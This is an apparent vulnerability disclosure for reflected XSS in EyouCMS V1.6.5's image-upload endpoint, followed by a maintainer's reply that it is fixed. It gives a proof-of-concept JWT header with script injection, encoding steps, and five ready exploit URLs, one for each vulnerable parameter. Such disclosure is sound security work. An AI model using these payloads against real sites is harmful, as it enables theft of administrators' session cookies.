EyouCMS-V1.6.5 has multiple reflective XSS vulnerabilities

[Hebing123]

Summary

EyouCMS-V1.6.5 When uploading images locally, the program will use the info parameter to set the parameters carried by the upload form.
Multiple reflective XSS vulnerabilities can be created by modifying the JWT encrypted HEADER of the accepted JSON data and setting the parameter it contains to a malicious value.
These parameters are: num,input,path,func,is_water

There is no update on github, the latest installation package (V1.6.5) is:
https://qiniu.eyoucms.com/source/EyouCMS-V1.6.5-UTF8-SP1_1221.zip

Details

The exploit of this XSS vulnerability is mainly to construct the form to carry parameters, header is directly referenced by <input> into the page.
The info parameter should be replaced with a "+" if it contains a "-" after JWT encryption. The guess is that the developer may have incorrectly implemented the logic of URL encoding and decoding, resulting in accepting only "+" and not "-". This may be because they only consider standard URL encoding rules and ignore URL security encoding rules.

POC

HEADER:ALGORITHM & TOKEN TYPE：

{
  "num": "1",
  "size": "2097152",
  "input": "",
  "func": "head_pic_call_back",
  "path": "allimg",
  "is_water": "1'\"()&%<zzz><ScRiPt >alert(9240)</ScRiPt>",
  "alg": "HS256"
}

Note: you do not need to carry data when encrypting, just encrypt the corresponding parameter of the header, replace "-" with "+", and then perform url encoding.Don't go in the wrong order, or you'll convert the + to a space.

In Header, when the num parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0NCk8L1NjUmlQdD4iLCJzaXplIjoiMjA5NzE1MiIsImlucHV0IjoiIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the input parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IlwiPjxTY1JpUHQgPmFsZXJ0KDk3NDUpPC9TY1JpUHQ%2BIiwiZnVuYyI6ImhlYWRfcGljX2NhbGxfYmFjayIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the path parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0Nyk8L1NjUmlQdD4iLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the func parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2tcIj48U2NSaVB0ID5hbGVydCg5NzQ2KTwvU2NSaVB0PiIsInBhdGgiOiJhbGxpbWciLCJpc193YXRlciI6IjEiLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

In Header, when the is_water parameter causes a reflected XSS vulnerability, the payload is:
http://192.168.160.147/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxIiwic2l6ZSI6IjIwOTcxNTIiLCJpbnB1dCI6IiIsImZ1bmMiOiJoZWFkX3BpY19jYWxsX2JhY2siLCJwYXRoIjoiYWxsaW1nIiwiaXNfd2F0ZXIiOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoOTc0OCk8L1NjUmlQdD4iLCJhbGciOiJIUzI1NiJ9&lang=cn&m=admin&unneed_syn=

Impact

An administrator who is already logged in can have a cookie stolen after accessing the malicious url.

[weng-xianhu]

Thank you for your feedback. It has been fixed and strict data processing has been carried out